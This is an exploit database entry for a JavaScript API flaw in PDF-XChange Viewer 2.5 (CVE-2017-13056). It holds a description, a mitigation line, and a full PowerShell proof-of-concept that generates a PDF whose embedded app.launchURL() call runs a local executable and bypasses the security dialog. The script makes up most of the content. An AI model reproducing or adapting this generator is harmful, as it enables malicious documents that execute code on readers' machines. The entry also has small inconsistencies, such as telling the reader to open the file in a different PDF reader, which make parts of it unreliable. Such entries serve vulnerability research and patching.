header-logo
Suggest Exploit
vendor:
PDF-XChange Viewer
by:
Daniele Votta
7,5
CVSS
HIGH
PDF Reader RCE
94
CWE
Product Name: PDF-XChange Viewer
Affected Version From: 2.5 (Build 314.0)
Affected Version To: 2.5 (Build 314.0)
Patch Exists: YES
Related CWE: 2017-13056
CPE: a:tracker_software_products_ltd:pdf-xchange_viewer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2017

PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)

This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer. The launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog.

Mitigation:

Ensure that the PDF-XChange Viewer is updated to the latest version and that all security patches are applied.
Source

Exploit-DB raw data:

# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
# Date: 21-08-2017
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
# Exploit Author: Daniele Votta
# Contact: vottadaniele@gmail.com
# Website: https://www.linkedin.com/in/vottadaniele/
# CVE: 2017-13056

# Category: PDF Reader RCE
 
1. Description

This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.
The launchURL() function allows an attacker to execute local files on the file
system and bypass the security dialog.

2. Proof of Concept (Generate evil PDF that start calc.exe) 
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
Step 3: Open the generated PDF with Nitro Pro PDF Reader
 
3. PDF Generation:

function New-PDFJS {

    

    # Use the desidered params

     [CmdletBinding()]
  
    Param (
        
    	[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
   
	[string]$msg = "Hello PDF",
 
        [string]$filename = "C:\Users\User\Desktop\calc.pdf"
  
    )

    

    # Use the PDFSharp-WPF.dll library path

    Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll

    $doc = New-Object PdfSharp.Pdf.PdfDocument
    $doc.Info.Title = $msg
    $doc.info.Creator = "AnonymousUser"
    $page = $doc.AddPage()

    $graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
    $font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
    $box  = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
    $graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)

    $dictjs = New-Object PdfSharp.Pdf.PdfDictionary
    $dictjs.Elements["/S"]  = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
    $dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
   
    $doc.Internals.AddObject($dictjs)

    $dict = New-Object PdfSharp.Pdf.PdfDictionary
    $pdfarray = New-Object PdfSharp.Pdf.PdfArray
    $embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")

    $dict.Elements["/Names"] = $pdfarray
    $pdfarray.Elements.Add($embeddedstring)
    $pdfarray.Elements.Add($dictjs.Reference)
    $doc.Internals.AddObject($dict)

    $dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
    $dictgroup.Elements["/JavaScript"] = $dict.Reference
    $doc.Internals.Catalog.Elements["/Names"] = $dictgroup

    $doc.Save($filename)
}

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42537.zip

Navigation

Suggest Exploit

Services By CQR